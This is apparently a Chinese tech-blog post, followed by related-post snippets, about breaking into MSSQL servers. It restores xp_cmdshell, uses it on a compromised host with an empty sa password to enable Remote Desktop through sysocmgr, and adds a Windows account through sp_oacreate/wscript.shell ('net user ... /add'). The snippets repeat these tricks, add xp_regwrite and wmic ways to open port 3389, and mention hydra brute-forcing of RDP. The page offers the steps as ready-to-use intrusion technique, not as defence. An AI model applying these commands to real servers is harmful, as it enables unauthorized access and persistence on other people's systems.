直接用SQL连接器开启3389

一、用SQL连接器恢复XP_CMDSHLLE的命令

(1)SQL Query Analyzer
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

去除

sp_dropextendedproc 'xp_cmdshell'

(3)MSSQL2000

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

修改sa密码 sp_password @old = null, @new = 'complexpwd', @loginame ='sa'
这个很简单,自己堵后门用:)

二、在可以运行XP_CMDSHELL的机器上直接开3389不需要上传的

实例过程:
连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
命令:xp_cmdshell "type c:\boot.ini" // 输入命令,看系统,server版的才能 开3389
执行成功,结果:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect

命令:xp_cmdshell "echo [Components] > c:\duguxike" //在c盘根目录建写入一个文件,文件名duguxike大家可以自己改为自己的
执行成功,结果:

命令:xp_cmdshell "echo TsEnable = on >> c:\duguxike" //追加写入
执行成功,结果:

命令:xp_cmdshell "type c:\duguxike" //看看duguxike里的内容是否正确
执行成功,结果:
[Components]
TsEnable = on
TsEnable = on

命令:xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q" //开3389,成功的话过会肉机会重启!!
执行成功,结果:
GetLocalManagedApplications returned (2)

之后就看大家的了,不过要记得册除新建的duguxike文件哦!!

三、不需要XP_CMDSHLL直接添加系统帐号,对XPLOG70.DLL被删很有效

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--
_content>如果XPCMDSHLL被删了第一条恢复
第二条可以执行XPCMDSHELL但是无法利用差异备分来上传的情况下使用(本人WIN2000下测试成功)
第三条XPLOG70.DLL被删除的情况下直接添加帐号前提对方了开了3389 139 23
才好用

SKF SimPro Quick 4.8.1发布 发布说明可以在SimPro手册的SKF SimPro Quick应用程序的一般部分下找到(帮助→SKF SimPro快速手册→一般→发布说明)。请删除旧版本,请备份您存储在C:\SKF SimPro xxx\files文件夹中的文件以及所有自定义报告模板和表格。我们很高兴地通知您,我们的轴承应用工程软件SKF SimPro Quick 4.8.1可供下载。将新的安装文件下载到本地计算机后,双击它安装向导将打开(按照说明操作)3.安装后,在本地机器上启动SKF SimPro Expert软件。 阅读详情

相关推荐

SQL连接器 SQL连接器

sql连接器

内网渗透测试:初探远程桌面的安全问题

远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择开 3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此,本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。文中若有不当之处还请各位大佬多多点评。

qq_53058639的博客 1677

sql数据库连接器(测试链接数据库的用户名和密码,可连接远程数据库)

可以链接sql数据库(微软其他数据库也可以,不过要先选择数据驱动器),本地数据库和远程数据库都能连接。用来测试数据库登录的用户和密码,非常实用的工具。

SQL语句直接开启3389

其实就是利用MSSQL的存储过程xp_regwrite 。大家在渗透MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启33893389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections 其 中键值DenyTSCo...

weixin_33912445的博客 362

提权【SQL语句直接开启3389

3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections其中键值DenyTSConnections 直接控制着3389开启和关闭,当该键值为0表示3389开启,1则表示关闭。而MSSQLxp_regwrite的存储过程可以对注册进行修...

weixin_34032621的博客 454

SQLServer/MsSql注入漏洞步骤、使用方法

msSQL/SQLserver数据库的使用方法;渗透SQLserver数据库的步骤

weixin_46928280的博客 5146

记录一次用kali爆破RDP(远程连接协议)

首先win7下win+R打开regedit.exe,进入后找到并进入目录HKEY_LOCAL_MACHINE\System\CurrentControiSet\Control\TerminalServer\WinStations\RDP-Tcp,在右侧找到PortNumber,双击编辑端口设置为3389(当然你想要修改其他的端口也行),十进制,并重启。使用kali自带的工具hydra进行爆破,这里字典使用的是kali自带的字典,具体位置看图。发现端口3389,如果没有,可以自行开启并进行测试。

m0_63699746的博客 6784

SQL恢复XP_CMDSHLL 以及XPLOG70.DLL被删 直接SQL连接器开启3389

SQL恢复XP_CMDSHLL 以及XPLOG70.DLL被删 直接SQL连接器开启3389SQL连接器恢复XP_CMDSHLLE的命令 (1)SQL Query Analyzersp_addextendedproc xp_cmdshell,@dllname=xplog70.dll(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_ad

|独自望海。。。 8961

SQL恢复XP_CMDSHLL,以及XPLOG70.DLL被删,直接SQL连接器开启3389

content>用SQL连接器恢复XP_CMDSHLLE的命令(1)SQL Query Analyzersp_addextendedproc xp_cmdshell,@dllname=xplog70.dll(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc xp_cmdshell,xpsql70.dll

whjtoby的专栏 1866

mysql 3389_SQL语句直接开启3389

其实就是利用MSSQL的存储过程xp_regwrite 。大家在渗透MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启33893389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections其 中键值DenyTSConne...

weixin_39797912的博客 403

SQL语句直接开启3389(转)

(( SQL语句直接开启3389 )) 3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections 其中键值DenyTSConnections 直接控制着3389开启和关闭,当该键值为0表示3389开启,1则 表示关闭。 ...

weixin_33841503的博客 228

SQL语句直接开启3389-***技巧

作者:晓华 其实就是利用MSSQL的存储过程xp_regwrite 。大家在***MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启33893389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConne...

weixin_33701294的博客 222

mysql xpcmd_SQL入侵恢复XP_CMDSHLL与开3389

一,用SQL连接器恢复XP_CMDSHLLE的命令(1)sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'去除sp_dropextendedproc '...

weixin_29956903的博客 284

SQL注入篇——利用SqlServer执行系统命令连接远程桌面

我们用到的函数是xp_cmdshell 利用此存储过程可以直接执行系统命令。 一、确立连接 输入IP+/1.php?id=1出现如下界面说明连接成功 二、使用master表开启xp_cmdshell服务 输入下列语句开启服务: ?id=1; use master; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC ...

爱国小白帽 2946

【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入,SQL注入点利用以及getshell

【网络安全-SQL注入】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-CSDN博客本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;

m0_67844671的博客 3259

关于xp_cmdshell

xpcmdshell

qq_42036164的博客 1409

命令行强制开启3389服务支持server2008和2003

1.C:\Windows\System32\wbem\wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 2.wmic /namespace:\\root\cimv2\terminalse

如鹿渴慕泉水的专栏 1万+

开启3389常用终端命令

1.查询终端端口xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Con...

weixin_34235457的博客 487

1949-2023年 省级-年平均气温数据

省年平均气温是指在某个省份内,一整年(通常为1月1日至12月31日)所有气象站观测到的日平均气温的平均值。这个指标反映了该省份在一年中的整体温度状况,是衡量一个地区气候特征的重要指标之一。由于气候变化的复杂性,年平均气温可能会受到多种因素的影响,如自然变率、人类活动等。因此,在分析和预测未来气候变化时,需要综合考虑多种因素数据省份名称、年份、年平均气温

上一篇: 配置系统未能初始化 错误的解决方案
下一篇: 常用端口
hhb008
博客等级 码龄15年 1粉丝 32原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值